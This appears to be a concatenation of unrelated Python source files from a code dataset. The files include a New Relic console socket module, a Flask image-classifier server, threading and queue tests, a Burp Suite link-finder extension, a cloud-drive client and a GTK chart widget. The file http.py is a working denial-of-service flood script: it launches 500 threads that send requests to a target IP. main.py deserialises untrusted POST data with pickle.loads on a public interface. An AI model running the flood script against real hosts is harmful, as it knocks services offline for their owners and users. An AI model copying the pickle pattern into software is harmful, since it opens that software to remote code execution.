block.append(" %s" % (line.strip()))
all.append("\n".join(block))
print("\n\n".join(all), file=self.stdout)
class ConnectionManager(object):
def __init__(self, listener_socket):
self.__listener_socket = listener_socket
self.__console_initialized = False
if not os.path.isabs(self.__listener_socket):
host, port = self.__listener_socket.split(":")
port = int(port)
self.__listener_socket = (host, port)
self.__thread = threading.Thread(target=self.__thread_run, name="NR-Console-Manager")
self.__thread.daemon = True
self.__thread.start()
def __socket_cleanup(self, path):
try:
os.unlink(path)
except Exception:
pass
def __thread_run(self):
if type(self.__listener_socket) == type(()):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(self.__listener_socket)
else:
try:
os.unlink(self.__listener_socket)
except Exception:
pass
listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
listener.bind(self.__listener_socket)
atexit.register(self.__socket_cleanup, self.__listener_socket)
os.chmod(self.__listener_socket, 0o600)
listener.listen(5)
while True:
client, addr = listener.accept()
if not self.__console_initialized:
self.__console_initialized = True
intercept_console()
shell = ConsoleShell()
shell.stdin = client.makefile("r")
shell.stdout = client.makefile("w")
while True:
try:
shell.cmdloop()
except Exception:
shell.stdout.flush()
print("Unexpected exception.", file=shell.stdout)
exc_info = sys.exc_info()
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2], file=shell.stdout)
exc_info = None
else:
break
shell.stdin = None
shell.stdout = None
del shell
client.close()
class ClientShell(cmd.Cmd):
prompt = "(newrelic) "
def __init__(self, config_file, stdin=None, stdout=None, log=None):
cmd.Cmd.__init__(self, stdin=stdin, stdout=stdout)
self.__config_file = config_file
self.__config_object = ConfigParser.RawConfigParser()
self.__log_object = log
if not self.__config_object.read([config_file]):
raise RuntimeError("Unable to open configuration file %s." % config_file)
listener_socket = self.__config_object.get("newrelic", "console.listener_socket") % {"pid": "*"}
if os.path.isabs(listener_socket):
self.__servers = [(socket.AF_UNIX, path) for path in sorted(glob.glob(listener_socket))]
else:
host, port = listener_socket.split(":")
port = int(port)
self.__servers = [(socket.AF_INET, (host, port))]
def emptyline(self):
pass
def help_help(self):
print(
"""help (command)
Output list of commands or help details for named command.""",
file=self.stdout,
)
def do_exit(self, line):
"""exit
Exit the client shell."""
return True
def do_servers(self, line):
"""servers
Display a list of the servers which can be connected to."""
for i in range(len(self.__servers)):
print("%s: %s" % (i + 1, self.__servers[i]), file=self.stdout)
def do_connect(self, line):
"""connect [index]
Connect to the server from the servers lift with given index. If
there is only one server then the index position does not need to
be supplied."""
if len(self.__servers) == 0:
print("No servers to connect to.", file=self.stdout)
return
if not line:
if len(self.__servers) != 1:
print("Multiple servers, which should be used?", file=self.stdout)
return
else:
line = "1"
try:
selection = int(line)
except Exception:
selection = None
if selection is None:
print("Server selection not an integer.", file=self.stdout)
return
if selection <= 0 or selection > len(self.__servers):
print("Invalid server selected.", file=self.stdout)
return
server = self.__servers[selection - 1]
client = socket.socket(server[0], socket.SOCK_STREAM)
client.connect(server[1])
def write():
while 1:
try:
c = sys.stdin.read(1)
if not c:
client.shutdown(socket.SHUT_RD)
break
if self.__log_object:
self.__log_object.write(c)
client.sendall(c.encode("utf-8"))
except Exception:
break
def read():
while 1:
try:
c = client.recv(1).decode("utf-8")
if not c:
break
if self.__log_object:
self.__log_object.write(c)
sys.stdout.write(c)
sys.stdout.flush()
except Exception:
break
thread1 = threading.Thread(target=write)
thread1.daemon = True
thread2 = threading.Thread(target=read)
thread2.daemon = True
thread1.start()
thread2.start()
thread2.join()
return True
def main():
if len(sys.argv) == 1:
print("Usage: newrelic-console config_file")
sys.exit(1)
shell = ClientShell(sys.argv[1])
shell.cmdloop()
if __name__ == "__main__":
main()
|
main.py
|
from flask import Flask, request
import pickle, json, cv2, math, threading
from imgReg import run
import tensorflow as tf
from cnn import CNN
import matplotlib.pyplot as plt
img_count = 0 # to assign image name
cnn = CNN("colour")
graph = tf.get_default_graph() # to tackle thread issues
app = Flask(__name__)
# Endpoint to receive image data then localizes and classifies images
@app.route('/', methods=['POST'])
def receiveImage():
global img_count, graph, predictions, images, uniquePreds, areas
content = request.data
frame = pickle.loads(content) # get serialized data
cv2.imwrite("../raw/img"+str(img_count)+".jpg", frame)
pred, file, area, pos = run(frame, graph, cnn, img_count)
predictions.append(pred)
if pred not in uniquePreds: # new prediction in this maze
images.append(file)
uniquePreds.add(pred)
areas[pred] = [img_count, area, pos]
print("Detected", pred)
elif pred > 0: # prediction has been detected before
temp_list = areas.get(pred)
# if this new prediction has a bigger bounding rectangle than the previous one
if area > temp_list[1]:
areas[pred] = [img_count, area, pos]
img_count+=1
return ('', 204) # return a no content response
# Endpoint to send classification results to algo team
@app.route('/end', methods=['GET'])
def finished():
global predictions, images
positions = []
new_preds = [-1 for i in range(len(predictions))]
for pred, temp in areas.items():
new_preds[temp[0]] = pred # update the final prediction list
for pred in new_preds:
if pred > 0:
# get the positions of the bounding rectangles
positions.append(areas.get(pred)[2])
print(json.dumps(new_preds)+";"+json.dumps(positions))
threading.Thread(target=plotImages, args=(images,)).start()
return json.dumps(new_preds)+";"+json.dumps(positions)
def plotImages(images):
toPlot = []
for file in images:
img = cv2.imread(file)
toPlot.append(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
_, axs = plt.subplots(math.ceil(len(toPlot)/3), 3, gridspec_kw = {'wspace':0, 'hspace':0}, figsize=(100,100))
for img, ax in zip(toPlot, axs.flatten()):
ax.imshow(img)
ax.set_xticklabels([])
ax.set_yticklabels([])
plt.show()
import os
os._exit(1)
# for debug
def forDebug():
global img_count, graph, predictions, images, areas, uniquePreds
import os
location = "../raw/"
files = os.listdir(location)
files = sorted(files, key=lambda x: int(x[3:-4]))
for f in files:
frame = cv2.imread(location+f)
pred, file, area, pos = run(frame, graph, cnn, img_count)
predictions.append(pred)
if pred not in uniquePreds:
images.append(file)
uniquePreds.add(pred)
areas[pred] = [img_count, area, pos]
print("Detected", pred)
elif pred > 0:
temp_list = areas.get(pred)
if area > temp_list[1]:
areas[pred] = [img_count, area, pos]
img_count+=1
# for debug
def debugEnd(images):
positions = []
new_preds = [-1 for i in range(len(predictions))]
for pred, temp in areas.items():
new_preds[temp[0]] = pred
for pred in new_preds:
if pred > 0:
positions.append(areas.get(pred)[2])
print(json.dumps(new_preds)+";"+json.dumps(positions))
toPlot = []
for file in images:
img = cv2.imread(file)
toPlot.append(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
_, axs = plt.subplots(math.ceil(len(toPlot)/3), 3, gridspec_kw = {'wspace':0, 'hspace':0}, figsize=(100,100))
for img, ax in zip(toPlot, axs.flatten()):
ax.imshow(img)
ax.set_xticklabels([])
ax.set_yticklabels([])
plt.show()
if __name__ == '__main__':
predictions = []
images = []
areas = {}
uniquePreds = set([-1])
app.run(host='0.0.0.0', port=8123)
# forDebug()
# debugEnd(images)
|
test_thread.py
|
from threading import Thread
from time import sleep
class test_thread:
def __init__(self):
self.direction = 0
self.step_counter = 0
def run(self):
thread_data = Thread(target=self.threaded_function_data)
thread_data.start()
sleep(2)
thread_data.killed = True
def threaded_function_data(self):
c = 0
while c < 100000000000000000:
print('lala')
c += 1
if __name__ == '__main__':
t = test_thread()
t.run()
|
batching_queue_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for actorpool.BatchingQueue.
Basic functionalities actorpool.BatchingQueue are tested
in libtorchbeast/actorpool_test.cc.
"""
import threading
import time
import unittest
import numpy as np
import torch
import libtorchbeast
class BatchingQueueTest(unittest.TestCase):
def test_bad_construct(self):
with self.assertRaisesRegex(ValueError, "Min batch size must be >= 1"):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=0, maximum_batch_size=1
)
with self.assertRaisesRegex(
ValueError, "Max batch size must be >= min batch size"
):
libtorchbeast.BatchingQueue(
batch_dim=3, minimum_batch_size=1, maximum_batch_size=0
)
def test_multiple_close_calls(self):
queue = libtorchbeast.BatchingQueue()
queue.close()
with self.assertRaisesRegex(RuntimeError, "Queue was closed already"):
queue.close()
def test_check_inputs(self):
queue = libtorchbeast.BatchingQueue(batch_dim=2)
with self.assertRaisesRegex(
ValueError, "Enqueued tensors must have more than batch_dim =="
):
queue.enqueue(torch.ones(5))
with self.assertRaisesRegex(
ValueError, "Cannot enqueue empty vector of tensors"
):
queue.enqueue([])
with self.assertRaisesRegex(
libtorchbeast.ClosedBatchingQueue, "Enqueue to closed queue"
):
queue.close()
queue.enqueue(torch.ones(1, 1, 1))
def test_simple_run(self):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=1, maximum_batch_size=1
)
inputs = torch.zeros(1, 2, 3)
queue.enqueue(inputs)
batch = next(queue)
np.testing.assert_array_equal(batch, inputs)
def test_batched_run(self, batch_size=2):
queue = libtorchbeast.BatchingQueue(
batch_dim=0, minimum_batch_size=batch_size, maximum_batch_size=batch_size
)
inputs = [torch.full((1, 2, 3), i) for i in range(batch_size)]
def enqueue_target(i):
while queue.size() < i:
# Make sure thread i calls enqueue before thread i + 1.
time.sleep(0.05)
queue.enqueue(inputs[i])
enqueue_threads = []
for i in range(batch_size):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
for t in enqueue_threads:
t.start()
batch = next(queue)
np.testing.assert_array_equal(batch, torch.cat(inputs))
for t in enqueue_threads:
t.join()
class BatchingQueueProducerConsumerTest(unittest.TestCase):
def test_many_consumers(
self, enqueue_threads_number=16, repeats=100, dequeue_threads_number=64
):
queue = libtorchbeast.BatchingQueue(batch_dim=0)
lock = threading.Lock()
total_batches_consumed = 0
def enqueue_target(i):
for _ in range(repeats):
queue.enqueue(torch.full((1, 2, 3), i))
def dequeue_target():
nonlocal total_batches_consumed
for batch in queue:
batch_size, *_ = batch.shape
with lock:
total_batches_consumed += batch_size
enqueue_threads = []
for i in range(enqueue_threads_number):
enqueue_threads.append(
threading.Thread(
target=enqueue_target, name=f"enqueue-thread-{i}", args=(i,)
)
)
dequeue_threads = []
for i in range(dequeue_threads_number):
dequeue_threads.append(
threading.Thread(target=dequeue_target, name=f"dequeue-thread-{i}")
)
for t in enqueue_threads + dequeue_threads:
t.start()
for t in enqueue_threads:
t.join()
queue.close()
for t in dequeue_threads:
t.join()
self.assertEqual(total_batches_consumed, repeats * enqueue_threads_number)
if __name__ == "__main__":
unittest.main()
|
http.py
|
#!/usr/bin/env python3
import random
import socket,threading,sys,random
import useragents
ip = sys.argv[1]
port = sys.argv[2]
print("[+] Attack Started >:)")
wdata = open("/home/kali/Desktop/DDoS/scripts/headers.txt","r")
data= wdata.read()
def attacks():
while True:
try:
ran = random.choice(useragents.uslist)
pack = str("GET HTTP/1.1\nHost:"+str(ip)+"\n\nUser-Agent:"+str(ran)+"\n\n"+data).encode("utf-8")
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,int(port)))
s.sendto(pack,(ip,int(port)))
except socket.error as e:
print("[!] Can't Connect the target, it could be down!")
print("\n\n",e)
exit()
for i in range(500):
thread = threading.Thread(target=attacks)
thread.start()
|
FransLinkfinder.py
|
#
# BurpLinkFinder - Find links within JS files.
#
# Copyright (c) 2019 Frans Hendrik Botes
# Credit to https://github.com/GerbenJavado/LinkFinder for the idea and regex
#
from burp import IBurpExtender, IScannerCheck, IScanIssue, ITab
from java.io import PrintWriter
from java.net import URL
from java.util import ArrayList, List
from java.util.regex import Matcher, Pattern
import binascii
import base64
import re
from javax import swing
from java.awt import Font, Color
from threading import Thread
from array import array
from java.awt import EventQueue
from java.lang import Runnable
from thread import start_new_thread
from javax.swing import JFileChooser
# Using the Runnable class for thread-safety with Swing
class Run(Runnable):
def __init__(self, runner):
self.runner = runner
def run(self):
self.runner()
# Needed params
JSExclusionList = ['jquery', 'google-analytics','gpt.js']
class BurpExtender(IBurpExtender, IScannerCheck, ITab):
def registerExtenderCallbacks(self, callbacks):
self.callbacks = callbacks
self.helpers = callbacks.getHelpers()
callbacks.setExtensionName("BurpJSLinkFinder")
callbacks.issueAlert("BurpJSLinkFinder Passive Scanner enabled")
stdout = PrintWriter(callbacks.getStdout(), True)
stderr = PrintWriter(callbacks.getStderr(), True)
callbacks.registerScannerCheck(self)
self.initUI()
self.callbacks.addSuiteTab(self)
print ("Burp JS LinkFinder loaded.")
print ("Copyright (c) 2019 Frans Hendrik Botes")
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n")
def initUI(self):
self.tab = swing.JPanel()
# UI for Output
self.outputLabel = swing.JLabel("LinkFinder Log:")
self.outputLabel.setFont(Font("Tahoma", Font.BOLD, 14))
self.outputLabel.setForeground(Color(255,102,52))
self.logPane = swing.JScrollPane()
self.outputTxtArea = swing.JTextArea()
self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12))
self.outputTxtArea.setLineWrap(True)
self.logPane.setViewportView(self.outputTxtArea)
self.clearBtn = swing.JButton("Clear Log", actionPerformed=self.clearLog)
self.exportBtn = swing.JButton("Export Log", actionPerformed=self.exportLog)
self.parentFrm = swing.JFileChooser()
# Layout
layout = swing.GroupLayout(self.tab)
layout.setAutoCreateGaps(True)
layout.setAutoCreateContainerGaps(True)
self.tab.setLayout(layout)
layout.setHorizontalGroup(
layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addGroup(layout.createParallelGroup()
.addComponent(self.outputLabel)
.addComponent(self.logPane)
.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
layout.setVerticalGroup(
layout.createParallelGroup()
.addGroup(layout.createParallelGroup()
.addGroup(layout.createSequentialGroup()
.addComponent(self.outputLabel)
.addComponent(self.logPane)
.addComponent(self.clearBtn)
.addComponent(self.exportBtn)
)
)
)
def getTabCaption(self):
return "BurpJSLinkFinder"
def getUiComponent(self):
return self.tab
def clearLog(self, event):
self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n" )
def exportLog(self, event):
chooseFile = JFileChooser()
ret = chooseFile.showDialog(self.logPane, "Choose file")
filename = chooseFile.getSelectedFile().getCanonicalPath()
print("\n" + "Export to : " + filename)
open(filename, 'w', 0).write(self.outputTxtArea.text)
def doPassiveScan(self, ihrr):
try:
urlReq = ihrr.getUrl()
testString = str(urlReq)
linkA = linkAnalyse(ihrr,self.helpers)
# check if JS file
if ".js" in str(urlReq):
# Exclude casual JS files
if any(x in testString for x in JSExclusionList):
print("\n" + "[-] URL excluded " + str(urlReq))
else:
self.outputTxtArea.append("\n" + "[+] Valid URL found: " + str(urlReq))
issueText = linkA.analyseURL()
for counter, issueText in enumerate(issueText):
#print("TEST Value returned SUCCESS")
self.outputTxtArea.append("\n" + "\t" + str(counter)+' - ' +issueText['link'])
issues = ArrayList()
issues.add(SRI(ihrr, self.helpers))
return issues
except UnicodeEncodeError:
print ("Error in URL decode.")
return None
def consolidateDuplicateIssues(self, isb, isa):
return -1
def extensionUnloaded(self):
print "Burp JS LinkFinder unloaded"
return
class linkAnalyse():
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
regex_str = """
(?:"|') # Start newline delimiter
(
((?:[a-zA-Z]{1,10}://|//) # Match a scheme [a-Z]*1-10 or //
[^"'/]{1,}\. # Match a domainname (any character + dot)
[a-zA-Z]{2,}[^"']{0,}) # The domainextension and/or path
|
((?:/|\.\./|\./) # Start with /,../,./
[^"'><,;| *()(%%$^/\\\[\]] # Next character can't be...
[^"'><,;|()]{1,}) # Rest of the characters can't be
|
([a-zA-Z0-9_\-/]{1,}/ # Relative endpoint with /
[a-zA-Z0-9_\-/]{1,} # Resource name
\.(?:[a-zA-Z]{1,4}|action) # Rest + extension (length 1-4 or action)
(?:[\?|/][^"|']{0,}|)) # ? mark with parameters
|
([a-zA-Z0-9_\-]{1,} # filename
\.(?:php|asp|aspx|jsp|json|
action|html|js|txt|xml) # . + extension
(?:\?[^"|']{0,}|)) # ? mark with parameters
)
(?:"|') # End newline delimiter
"""
def parser_file(self, content, regex_str, mode=1, more_regex=None, no_dup=1):
#print ("TEST parselfile #2")
regex = re.compile(regex_str, re.VERBOSE)
items = [{"link": m.group(1)} for m in re.finditer(regex, content)]
if no_dup:
# Remove duplication
all_links = set()
no_dup_items = []
for item in items:
if item["link"] not in all_links:
all_links.add(item["link"])
no_dup_items.append(item)
items = no_dup_items
# Match Regex
filtered_items = []
for item in items:
# Remove other capture groups from regex results
if more_regex:
if re.search(more_regex, item["link"]):
#print ("TEST parselfile #3")
filtered_items.append(item)
else:
filtered_items.append(item)
return filtered_items
# Potential for use in the future...
def threadAnalysis(self):
thread = Thread(target=self.analyseURL(), args=(session,))
thread.daemon = True
thread.start()
def analyseURL(self):
endpoints = ""
#print("TEST AnalyseURL #1")
mime_type=self.helpers.analyzeResponse(self.reqres.getResponse()).getStatedMimeType()
if mime_type.lower() == 'script':
url = self.reqres.getUrl()
encoded_resp=binascii.b2a_base64(self.reqres.getResponse())
decoded_resp=base64.b64decode(encoded_resp)
endpoints=self.parser_file(decoded_resp, self.regex_str)
#print("TEST AnalyseURL #2")
return endpoints
return endpoints
class SRI(IScanIssue,ITab):
def __init__(self, reqres, helpers):
self.helpers = helpers
self.reqres = reqres
def getHost(self):
return self.reqres.getHost()
def getPort(self):
return self.reqres.getPort()
def getProtocol(self):
return self.reqres.getProtocol()
def getUrl(self):
return self.reqres.getUrl()
def getIssueName(self):
return "Linkfinder Analysed JS files"
def getIssueType(self):
return 0x08000000 # See http:#portswigger.net/burp/help/scanner_issuetypes.html
def getSeverity(self):
return "Information" # "High", "Medium", "Low", "Information" or "False positive"
def getConfidence(self):
return "Certain" # "Certain", "Firm" or "Tentative"
def getIssueBackground(self):
return str("JS files holds links to other parts of web applications. Refer to TAB for results.")
def getRemediationBackground(self):
return "This is an <b>informational</b> finding only.<br>"
def getIssueDetail(self):
return str("Burp Scanner has analysed the following JS file for links: <b>"
"%s</b><br><br>" % (self.reqres.getUrl().toString()))
def getRemediationDetail(self):
return None
def getHttpMessages(self):
#print ("................raising issue................")
rra = [self.reqres]
return rra
def getHttpService(self):
return self.reqres.getHttpService()
if __name__ in ('__main__', 'main'):
EventQueue.invokeLater(Run(BurpExtender))
|
drive_client.py
|
import logging
import asyncio
import os
import inject
from enum import Enum
from typing import List, AsyncIterator
from datetime import datetime
from collections import deque
from threading import Thread
from dataclasses import dataclass
from mycloud.constants import CHUNK_SIZE
from mycloud.mycloudapi.helper import generator_to_stream
from mycloud.drive.exceptions import (DriveFailedToDeleteException,
DriveNotFoundException)
from mycloud.mycloudapi import (MyCloudRequestExecutor, MyCloudResponse,
ObjectResourceBuilder)
from mycloud.mycloudapi.requests.drive import (DeleteObjectRequest,
GetObjectRequest,
MetadataRequest,
PutObjectRequest,
MyCloudMetadata,
RenameRequest,
FileEntry,
DirEntry)
class ReadStream:
def __init__(self, content):
self._content = content
self._loop = asyncio.get_event_loop()
def read(self, length):
res = asyncio.run_coroutine_threadsafe(
self._content.read(length), self._loop)
return res.result()
async def read_async(self, length):
return await self._content.read(length)
def close(self):
pass
class WriteStream:
def __init__(self, exec_stream):
self._loop = asyncio.get_event_loop()
self._exec = exec_stream
# TODO: queue size should depend on size of individual items?
self._queue = asyncio.Queue(maxsize=1)
self._closed = False
self._thread = None
def writelines(self, generator):
stream = generator_to_stream(generator)
asyncio.run_coroutine_threadsafe(
self._exec(stream), self._loop).result()
def write(self, bytes):
self._put_queue(bytes)
self._start()
async def write_async(self, bytes):
await self._put_queue_async(bytes)
self._start()
def close(self):
self._closed = True
if self._thread:
self._thread.join()
del self._queue
async def _put_queue_async(self, item):
await self._queue.put(item)
def _put_queue(self, item):
asyncio.run_coroutine_threadsafe(
self._queue.put(item), self._loop).result()
def _start(self):
if self._thread is not None:
return
def r():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self._exec(self._generator()))
self._thread = Thread(target=r)
self._thread.start()
async def _generator(self):
while not self._closed or not self._queue.empty():
if not self._queue.empty(): # TODO: should be done with asyncio
yield self._queue.get_nowait()
class EntryType(Enum):
File = 0
Dir = 1
Enoent = 2
@dataclass
class EntryStats:
entry_type: EntryType
name: str
path: str
creation_time: datetime
modification_time: datetime
NO_ENTRY = EntryStats(EntryType.Enoent, '', '', datetime.min, datetime.min)
ROOT_ENTRY = EntryStats(EntryType.Dir, '/', '/', datetime.min, datetime.min)
class DriveClient:
request_executor: MyCloudRequestExecutor = inject.attr(
MyCloudRequestExecutor)
async def ls(self, remote: str) -> MyCloudMetadata:
return await self._get_directory_metadata_internal(remote)
async def stat(self, path: str):
normed = os.path.normpath(path)
if normed == '/':
return ROOT_ENTRY
basename = os.path.basename(normed)
try:
metadata = await self.ls(os.path.dirname(normed))
def first(l):
try:
return next(filter(lambda x: x.name == basename, l))
except StopIteration:
return None
file = first(metadata.files)
if file is not None:
return EntryStats(
EntryType.File,
name=file.name,
path=file.path,
creation_time=file.creation_time,
modification_time=file.modification_time)
directory = first(metadata.dirs)
if directory is not None:
return EntryStats(
EntryType.Dir,
name=directory.name,
path=directory.path,
creation_time=directory.creation_time,
modification_time=directory.modification_time)
return NO_ENTRY
except DriveNotFoundException:
return NO_ENTRY
async def open_read(self, path: str):
get = GetObjectRequest(path, is_dir=False)
resp = await self.request_executor.execute(get)
DriveClient._raise_404(resp)
return ReadStream(resp.result.content)
async def open_write(self, path: str):
def exec_stream(g):
return self.request_executor.execute(
PutObjectRequest(path, g, is_dir=False))
return WriteStream(exec_stream)
async def mkfile(self, path: str):
put_request = PutObjectRequest(path, None, False)
await self.request_executor.execute(put_request)
async def mkdirs(self, path: str):
put_request = PutObjectRequest(path, None, True)
await self.request_executor.execute(put_request)
async def move(self, from_path, to_path):
stat = await self.stat(from_path)
rename_request = RenameRequest(
from_path, to_path, stat.is_file)
await self.request_executor.execute(rename_request)
async def copy(self, from_path, to_path):
# assume it's a file for now?
read_stream = await self.open_read(from_path)
write_stream = await self.open_write(to_path)
while True:
read = await read_stream.read_async(CHUNK_SIZE)
if not read:
break
await write_stream.write_async(read)
read_stream.close()
write_stream.close()
async def delete(self, path: str):
stat = await self.stat(path)
return await self._delete_internal(path, stat.entry_type == EntryType.Dir)
async def _delete_internal(self, path: str, is_dir):
try:
await self._delete_single_internal(path, is_dir)
except DriveFailedToDeleteException:
if not is_dir:
raise # probably an unrecoverable error, if it's not a directory
metadata = await self._get_directory_metadata_internal(path)
for remote_file in metadata.files:
await self._delete_internal(remote_file.path, False)
for directory in metadata.dirs:
await self._delete_internal(directory.path, True)
async def _delete_single_internal(self, path: str, is_dir):
delete_request = DeleteObjectRequest(path, is_dir)
resp = await self.request_executor.execute(delete_request)
DriveClient._raise_404(resp)
if not resp.success:
logging.info(f'Failed to delete {path}')
raise DriveFailedToDeleteException
async def _get_directory_metadata_internal(self, path: str) -> MyCloudMetadata:
req = MetadataRequest(path)
resp = await self.request_executor.execute(req)
DriveClient._raise_404(resp)
return await resp.formatted()
@staticmethod
def _raise_404(response: MyCloudResponse):
if response.result.status == 404:
raise DriveNotFoundException
|
ticker.py
|
import os
import threading
import time
from collections import defaultdict
import atexit
import numpy
from gi.repository import Gtk, GObject
from matplotlib import rcParams
from matplotlib.animation import FuncAnimation
from matplotlib.backends.backend_gtk3cairo import FigureCanvasGTK3Cairo as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.lines import Line2D
from mxdc.utils import misc
from mxdc.widgets import dialogs
rcParams['font.family'] = 'Cantarell'
rcParams['font.size'] = 10
COLORS = [
'#1f77b4',
'#ff7f0e',
'#2ca02c',
'#d62728',
'#9467bd',
'#8c564b',
'#e377c2',
'#7f7f7f',
'#bcbd22',
'#17becf'
]
class TickerChart(Gtk.Box):
__gsignals__ = {
'cursor-time': (GObject.SignalFlags.RUN_FIRST, None, (object,)),
}
def __init__(self, interval=100, view=20, keep=None, linewidth=1):
super().__init__()
self.fig = Figure(dpi=72)
self.canvas = FigureCanvas(self.fig)
self.pack_start(self.canvas, True, True, 0)
self.data = {}
self.plots = {}
self.info = {}
self.alternates = set()
self.active = None
self.axes = []
self.axes.append(self.fig.add_subplot(111))
self.fig.subplots_adjust(left=0.12, right=0.88)
self.axes[0].set_xlabel('seconds ago')
self.interval = interval # milliseconds
self.view_range = view # seconds
self.keep_range = keep or (view * 4) # seconds
self.linewidth = linewidth
self.keep_size = int(self.keep_range * 1000 / self.interval)
self.view_step = view // 2
self.deviation = 20
self.view_time = time.time()
self.add_data('time')
self.paused = False
self.show_all()
def pause(self):
self.paused = True
def resume(self):
self.paused = False
def zoom_out(self):
self.view_range = max(self.view_range - self.view_step, self.view_step)
self.update()
def zoom_in(self):
self.view_range = min(self.view_range + self.view_step, self.keep_range)
self.update()
def incr_margin(self):
self.deviation = min(self.deviation + 5, 50)
self.update()
def decr_margin(self):
self.deviation = max(self.deviationi - 5, 5)
self.update()
def add_data(self, name):
if name in self.data:
return
self.data[name] = numpy.empty(self.keep_size)
self.data[name][:] = numpy.nan
def resize_data(self):
for name, data in list(self.data.items()):
self.data[name] = numpy.empty(self.keep_size)
if self.max_samples > len(data):
self.data[name][-len(data):] = data
else:
self.data[name] = data[-self.keep_size:]
def select_active(self, name):
if name in self.alternates:
self.active = name
self.axes[1].set_ylabel(name)
def add_alternate(self, name):
self.alternates.add(name)
def shift_data(self):
for name, data in list(self.data.items()):
data[:-1] = data[1:]
def add_plot(self, name, color=None, linestyle='-', axis=0, alternate=False):
assert axis in [0, 1], 'axis must be 0 or 1'
if axis == 1 and len(self.axes) == 1:
self.axes.append(self.axes[0].twinx())
if not color:
color = COLORS[len(self.plots)]
self.plots[name] = Line2D([], [], color=color, linewidth=self.linewidth, linestyle=linestyle)
self.axes[axis].add_line(self.plots[name])
self.axes[axis].set_ylabel(name, color=color)
self.info[name] = {'color': color, 'linestyle': linestyle, 'axis': axis}
if alternate:
self.add_alternate(name)
self.select_active(name)
self.add_data(name)
def clear(self):
for name, line in list(self.plots.items()):
self.data[name][:] = numpy.nan
def update(self):
if self.paused:
return
selector = ~numpy.isnan(self.data['time'])
selector[selector] = (
(self.data['time'][selector] > (self.view_time - self.view_range))
& (self.data['time'][selector] <= self.view_time)
)
if selector.sum() < 2:
return
now = self.data['time'][selector][-1]
x_data = self.data['time'][selector] - now
xmin, xmax = min(x_data.min(), -self.view_range), x_data.max()
extrema = defaultdict(lambda: (numpy.nan, numpy.nan))
for name, line in list(self.plots.items()):
if name in self.alternates and name != self.active: continue
axis = self.info[name]['axis']
ymin, ymax = extrema[axis]
y_data = self.data[name][selector]
mn, mx = misc.get_min_max(y_data, ldev=self.deviation, rdev=self.deviation)
ymin, ymax = numpy.nanmin([ymin, mn]), numpy.nanmax([ymax, mx])
extrema[axis] = (ymin, ymax)
line.set_data(x_data, y_data)
for i, (ymin, ymax) in list(extrema.items()):
if ymin != ymax:
self.axes[i].set_ylim(ymin, ymax)
if xmin != xmax:
self.axes[i].set_xlim(xmin, xmax)
def redraw(self):
self.canvas.draw_idle()
def animate(self, i):
self.update()
return list(self.plots.values())
def save(self):
dialog = Gtk.FileChooserDialog(
"Save Chart ...", dialogs.MAIN_WINDOW, Gtk.FileChooserAction.SAVE,
(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, Gtk.STOCK_SAVE, Gtk.ResponseType.OK)
)
dialog.set_size_request(600, 300)
response = dialog.run()
if response == Gtk.ResponseType.OK:
img_filename = dialog.get_filename()
if os.access(os.path.dirname(img_filename), os.W_OK):
self.fig.savefig(img_filename)
dialog.destroy()
class ChartManager(GObject.GObject):
def __init__(self, interval=100, view=20):
GObject.GObject.__init__(self)
self.chart = TickerChart(interval=interval, view=view)
self.sources = {}
self.values = {}
self.interval = interval / 1000. # convert from milliseconds to seconds
self.animation = FuncAnimation(self.chart.fig, self.chart.animate, None, interval=interval, blit=False)
self.start()
atexit.register(self.stop)
def add_plot(self, dev, name, signal='changed', color=None, linestyle='-', axis=0, alternate=False):
self.chart.add_plot(name, color=color, linestyle=linestyle, axis=axis, alternate=alternate)
self.values[name] = numpy.nan
self.sources[name] = dev.connect(signal, self.collect_data, name)
def select_active(self, name):
self.chart.select_active(name)
def zoom_in(self, *args, **kwargs):
self.chart.zoom_in()
def zoom_out(self, *args, **kwargs):
self.chart.zoom_out()
def clear(self, *args, **kwargs):
self.chart.clear()
def save(self, *args, **kwargs):
self.chart.save()
def collect_data(self, dev, value, name):
self.values[name] = value
def start(self):
"""Start the Data monitor thread """
self._stopped = False
worker_thread = threading.Thread(name="TickerSampler", target=self.update_data)
worker_thread.setDaemon(True)
worker_thread.start()
def stop(self):
self._stopped = True
def pause(self, *args, **kwargs):
self.chart.pause()
def resume(self, *args, **kwargs):
self.chart.resume()
def is_paused(self):
return self.chart.paused
def update_data(self):
# update the values of the array every interval seconds, shift left
while not self._stopped:
self.chart.shift_data()
if not self.is_paused():
for name, value in list(self.values.items()):
if name in self.chart.data:
self.chart.data[name][-1] = value
self.chart.data['time'][-1] = time.time()
self.chart.view_time = time.time()
time.sleep(self.interval)
def cleanup(self):
self.stop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.